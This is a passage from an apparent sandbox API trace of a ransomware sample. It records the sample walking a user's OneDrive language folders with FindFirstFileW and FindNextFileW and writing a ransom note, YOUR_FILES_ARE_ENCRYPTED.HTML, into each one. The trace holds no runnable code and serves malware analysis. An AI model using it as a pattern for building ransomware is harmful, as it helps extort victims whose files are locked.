ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfa977fad, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x27aa09b, cFileName="..", cAlternateFileName="")) returned 1 [0112.532] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa977fad, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfa977fad, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfaefb782, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x160c0, dwReserved0=0x19e010, dwReserved1=0x27aa09b, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0112.532] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.532] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\lt\\FileSync.LocalizedResources.dll.mui") returned 114 [0112.532] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.532] lstrlenW (lpString=".mui") returned 4 [0112.532] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.532] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa977fad, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfa977fad, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfaefb782, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x160c0, dwReserved0=0x19e010, dwReserved1=0x27aa09b, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0112.532] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0112.532] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\lt\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0112.532] GetProcessHeap () returned 0x600000 [0112.532] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d020 [0112.532] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\lt\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_2\\lt\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0112.532] WriteFile (in: hFile=0x328, lpBuffer=0x315d020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d020*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0112.533] CloseHandle (hObject=0x328) returned 1 [0112.533] GetProcessHeap () returned 0x600000 [0112.533] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d020 | out: hHeap=0x600000) returned 1 [0112.534] GetProcessHeap () returned 0x600000 [0112.534] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0112.534] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb006851, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfb006851, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfb006851, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="lv", cAlternateFileName="")) returned 1 [0112.534] StrStrIW (lpFirst="lv", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.534] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\lv") returned 78 [0112.534] GetProcessHeap () returned 0x600000 [0112.534] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30a0048 [0112.534] lstrcpyW (in: lpString1=0x30a0048, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\lv" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\lv") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\lv" [0112.534] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\lv", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\lv\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\lv\\*" [0112.534] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\lv\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb006851, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfb006851, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfb3017e0, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x27aa09b, cFileName=".", cAlternateFileName="")) returned 0x626838 [0112.534] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb006851, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfb006851, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfb3017e0, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x27aa09b, cFileName="..", cAlternateFileName="")) returned 1 [0112.534] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb3017e0, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfb3017e0, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfb622788, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x15ec0, dwReserved0=0x19e010, dwReserved1=0x27aa09b, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0112.534] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.534] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\lv\\FileSync.LocalizedResources.dll.mui") returned 114 [0112.534] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.534] lstrlenW (lpString=".mui") returned 4 [0112.534] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.534] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb3017e0, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfb3017e0, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfb622788, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x15ec0, dwReserved0=0x19e010, dwReserved1=0x27aa09b, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0112.534] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0112.534] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\lv\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0112.534] GetProcessHeap () returned 0x600000 [0112.534] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d020 [0112.534] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\lv\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_2\\lv\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0112.535] WriteFile (in: hFile=0x328, lpBuffer=0x315d020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d020*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0112.536] CloseHandle (hObject=0x328) returned 1 [0112.536] GetProcessHeap () returned 0x600000 [0112.536] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d020 | out: hHeap=0x600000) returned 1 [0112.536] GetProcessHeap () returned 0x600000 [0112.536] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0112.536] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb969ac6, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfb969ac6, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfb969ac6, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="mi-nz", cAlternateFileName="")) returned 1 [0112.536] StrStrIW (lpFirst="mi-nz", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.536] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\mi-nz") returned 81 [0112.536] GetProcessHeap () returned 0x600000 [0112.536] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30a0048 [0112.536] lstrcpyW (in: lpString1=0x30a0048, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\mi-nz" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\mi-nz") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\mi-nz" [0112.536] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\mi-nz", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\mi-nz\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\mi-nz\\*" [0112.536] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\mi-nz\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb969ac6, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfb969ac6, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfbe2e789, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x27aa09b, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0112.537] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb969ac6, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfb969ac6, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfbe2e789, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x27aa09b, cFileName="..", cAlternateFileName="")) returned 1 [0112.537] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbe2e789, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfbe2e789, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfbfd20c1, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x156c0, dwReserved0=0x19e010, dwReserved1=0x27aa09b, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0112.537] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.537] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\mi-nz\\FileSync.LocalizedResources.dll.mui") returned 117 [0112.537] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.537] lstrlenW (lpString=".mui") returned 4 [0112.537] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.537] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbe2e789, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfbe2e789, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfbfd20c1, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x156c0, dwReserved0=0x19e010, dwReserved1=0x27aa09b, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0112.537] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0112.537] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\mi-nz\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 111 [0112.537] GetProcessHeap () returned 0x600000 [0112.537] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d020 [0112.537] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\mi-nz\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_2\\mi-nz\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0112.540] WriteFile (in: hFile=0x328, lpBuffer=0x315d020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d020*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0112.543] CloseHandle (hObject=0x328) returned 1 [0112.543] GetProcessHeap () returned 0x600000 [0112.543] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d020 | out: hHeap=0x600000) returned 1 [0112.543] GetProcessHeap () returned 0x600000 [0112.543] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0112.544] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc090d46, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfc090d46, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfc090d46, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="mk", cAlternateFileName="")) returned 1 [0112.544] StrStrIW (lpFirst="mk", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.544] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\mk") returned 78 [0112.544] GetProcessHeap () returned 0x600000 [0112.544] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30a0048 [0112.546] lstrcpyW (in: lpString1=0x30a0048, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\mk" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\mk") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\mk" [0112.546] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\mk", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\mk\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\mk\\*" [0112.546] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\mk\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc090d46, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfc090d46, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfc2f31ae, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x27aa09b, cFileName=".", cAlternateFileName="")) returned 0x626778 [0112.547] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc090d46, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfc090d46, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfc2f31ae, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x27aa09b, cFileName="..", cAlternateFileName="")) returned 1 [0112.548] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc2f31ae, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfc2f31ae, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfc63a815, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x162c0, dwReserved0=0x19e010, dwReserved1=0x27aa09b, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0112.548] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.548] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\mk\\FileSync.LocalizedResources.dll.mui") returned 114 [0112.548] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.548] lstrlenW (lpString=".mui") returned 4 [0112.548] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.548] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc2f31ae, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfc2f31ae, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfc63a815, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x162c0, dwReserved0=0x19e010, dwReserved1=0x27aa09b, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0112.548] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0112.548] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\mk\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0112.548] GetProcessHeap () returned 0x600000 [0112.548] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d020 [0112.548] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\mk\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_2\\mk\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0112.549] WriteFile (in: hFile=0x328, lpBuffer=0x315d020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d020*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0112.550] CloseHandle (hObject=0x328) returned 1 [0112.550] GetProcessHeap () returned 0x600000 [0112.550] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d020 | out: hHeap=0x600000) returned 1 [0112.550] GetProcessHeap () returned 0x600000 [0112.550] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0112.550] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc71f7fa, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfc71f7fa, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfc71f7fa, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="ml-in", cAlternateFileName="")) returned 1 [0112.550] StrStrIW (lpFirst="ml-in", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.550] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ml-in") returned 81 [0112.550] GetProcessHeap () returned 0x600000 [0112.550] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30a0048 [0112.550] lstrcpyW (in: lpString1=0x30a0048, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ml-in" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ml-in") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ml-in" [0112.550] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ml-in", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ml-in\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ml-in\\*" [0112.550] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ml-in\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc71f7fa, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfc71f7fa, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfcf9de36, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x27aa09b, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0112.552] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc71f7fa, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfc71f7fa, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfcf9de36, ftLastWriteTime.dwHighDateTime=0x1d70070, 